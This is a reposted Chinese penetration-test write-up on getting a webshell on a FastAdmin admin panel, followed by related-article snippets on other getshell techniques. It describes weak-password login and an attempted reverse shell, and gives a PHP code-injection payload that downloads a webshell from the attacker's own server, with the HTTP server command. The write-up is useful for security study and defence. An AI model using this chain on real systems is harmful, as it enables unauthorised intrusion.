记一次FastAdmin后台Getshell

这篇具有很好参考价值的文章主要介绍了记一次FastAdmin后台Getshell。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。


一、FastAdmin 介绍

FastAdmin 是基于ThinkPHP5和Bootstrap的极速后台开发框架。 基于ThinkPHP行为功能实现的插件机制,拥有丰富的插件和扩展,可直接在线安装卸载 。 基于完善的Auth权限控制管理、无限父子级权限分组、可自由分配子级权限、一个管理员可同时属于多个组别 。

二、测试过程

在某次HVV的打点过程中,发现某资产为FastAdmin搭建。
下图为FastAdmin的报错页面,根据经验可判断该网站为FastAdmin搭建。
记一次FastAdmin后台Getshell

输入admin.php进入后台登录页面,弱口令进入后台。
记一次FastAdmin后台Getshell
记一次FastAdmin后台Getshell

进入后台找功能点getshell。后台默认会有插件管理功能,但是我们在后台没有找到这个功能,我们直接访问插件管理的地址
插件管理地址: /admin/addon?ref=addtabs
记一次FastAdmin后台Getshell

理论上离线安装 Fileix文件管理器 ,然后上传一句话木马就可以getshell,但是很可惜失败了。
记一次FastAdmin后台Getshell

接着翻后台,发现有定时任务功能,尝试反弹shell,写入反弹shell的语句后,在服务器上nc监听等待回连,但是发现并没有执行。
记一次FastAdmin后台Getshell

后面一看之前管理员设置过的定时任务也没有执行过,失败!
记一次FastAdmin后台Getshell

继续翻后台,发现在菜单规则中可以创建规则条件,尝试在功能点中写入phpinfo()
必须写在权限管理中!!!
记一次FastAdmin后台Getshell

然后来到管理员管理中,添加一个管理员。
所属组别必须为二级管理员组!!!
记一次FastAdmin后台Getshell

添加完成之后,重新用新添加的账户登录后台,可以发现phpinfo()被成功执行。
记一次FastAdmin后台Getshell

通过搜索$_SERVER[‘DOCUMENT_ROOT’]获取网站根目录,为/www/wwwroot/xxxxxxxxx/
记一次FastAdmin后台Getshell

找到根路径后注销账户,准备一个webshell木马名为1.php,放在自己的服务器上,使用python启动一个临时web。

python3 -m http.server 8080

记一次FastAdmin后台Getshell

在回到管理后台当中,在同样的位置写入如下语句,将远程服务器的webshell木马下载到网站根目录。

file_put_contents('/www/wwwroot/xxxxxxxxx/shell.php',file_get_contents('临时web地址/1.php'))

记一次FastAdmin后台Getshell

保存完成后,再次使用刚才新创建的用户登录
记一次FastAdmin后台Getshell
记一次FastAdmin后台Getshell

webshell木马已被成功写入。
记一次FastAdmin后台Getshell

三、总结

在打点过程中, 通过指纹识别软件进行指纹识别进行相应的漏洞利用,在未识别出指纹的需人工判断,根据报错页面的样式识别指纹一种较好的方法。
整体打点过程:浏览网站—>发现报错页面指纹为FastAdmin—>通过弱口令进入后台—>规则条件中写入phpinfo()—>获得网站根目录—>规则条件中写入webshell文章来源地址https://www.toymoban.com/news/detail-465158.html

到了这里,关于记一次FastAdmin后台Getshell的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【kafka】记一次kafka基于linux的原生命令的使用

    环境是linux,4台机器,版本3.6,kafka安装在node 1 2 3 上,zookeeper安装在node2 3 4上。 安装好kafka,进入bin目录,可以看到有很多sh文件,是我们执行命令的基础。 启动kafka,下面的命令的后面带的配置文件的相对路径 遇到不熟悉的sh文件,直接输入名字并回车,就会提示你可用的

    2024年02月05日
    浏览(36)
  • 某某大学某学院后台Phar反序列化GetShell

    觉得这个洞还算有点意思,可以记录一下 首先在另一个二级学院进行目录扫描时发现源码 www.rar ,并且通过一些页面测试推测这两个二级学院应该是使用了同一套CMS 分析源码,发现使用的是 ThinkPHP 5.1.34 LTS 框架 通过APP、Public得到后台访问路径 /bhadmin 后台登陆存在弱口令(弱

    2024年02月14日
    浏览(41)
  • XXL-JOB 任务调度中心 后台反弹getshell

     访问漏洞场景,使用弱口令admin/123456,进入后台 在任务管理处新增 运行模式一定要选shell模式,其他的地方随便填   保存之后点击操作 选择GLUE IDE,我们可以通过DNSlog判断一下 然后我们保存,然后执行一次 刷新之后,出现下图情况,证明设备出网 DNSLog Platform   那我们就可

    2024年02月04日
    浏览(30)
  • 一次暴露面全开的红帽渗透测试【getshell】

    注:本次信息收集过程主要使用FOFA网络探测平台 https://fofa.info/ 一开始进行收集的时候,有点迷,直接进行了大面积的\\\"gov.in\\\"域名收集 哈哈68465条数据,想想就起飞,但是有个问题来了,怎么下载到本地,高级用户的API也只能调用下载1w条数据,左思右想。 试着写了个脚本看

    2024年02月13日
    浏览(28)
  • 帝国Cms7.5后台getshell | (CVE-2018-18086)漏洞复现

    漏洞描述 EmpireCMS(帝国网站管理系统)是一套内容管理系统( CMS ),EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以 实现任意代码执行 ,EmpireCMS7.5版本中的/e/class/moddofun.php文件的 LoadInMod函数 存在安全漏洞,攻击者可利用该漏

    2023年04月13日
    浏览(27)
  • 【漏洞复现】Apache_Tomcat7+ 弱口令 && 后台getshell漏洞

    感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规 说明 内容 漏洞编号 漏洞名称 Tomcat7+ 弱口令 后台getshell漏洞 漏洞评级 高危 影响范围 Tomcat 版本:8.0 漏洞描述 Tomcat 支持在后台部署 war 文件,可以直接将 webshell 部署到 web 目录下。其中,欲访问后台,

    2024年02月05日
    浏览(31)
  • 记录一次Redis未授权getshell几种常见方法

    Redis默认情况下,端口是6379,默认配置无密码 造成未授权访问原因: 1.未开启登录验证,并且把IP绑定到0.0.0.0 2.未开启登录验证,没有设置绑定IP,protected-mode关闭 利用条件 已知web的绝对路径 具有读写权限 利用过程 1.设置数据库备份目录为linux计划任务目录 2.写入webshell并同

    2023年04月20日
    浏览(23)
  • 记一次基于FPGA的VGA显示四操作数计算器工程的开发流程——(1)从顶层设计说起

    首先值得说明的是,在这个项目几乎完成之际,笔者才愈发体会到了硬件思维和软件思维的云泥之别。不幸的是,在此项目的实现过程中,绝大部分代码的思维仍然是软件思维,因此该项目主要模块的设计部分可能并不能体现硬件操作的独到之处,不符合硬件工程师的基本设

    2024年02月04日
    浏览(31)
  • 【Vulfocus靶场-初级】Tomcat后台弱口令+War包文件上传Getshell漏洞复现

    之前听说过这个漏洞,也看过分析的文章,但是可惜护网实战一直遇不到tomcat,或者口令破不进去,挺遗憾的,所以找不到实战的例子来写,怕自己忘了没地方查,所以我就干脆拿个靶场来记记。 提示:以下是本篇文章正文内容,下面案例可供参考 在vulfocus官网注册一个账号

    2024年02月09日
    浏览(33)
  • 记一次git冲突解决

    在提交mr的时候突然遇到了conflict,这时候意识到没有及时pull代码,脑海中想起了隔壁一起入职的同事经常念叨的一句“每天早上来都pull一下代码”。但是已经迟了 我看了一下,主要是同一个文件,master分支上已经被修改过,然后我要mr的代码也在这个文件上进行了修改。因

    2024年02月05日
    浏览(30)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包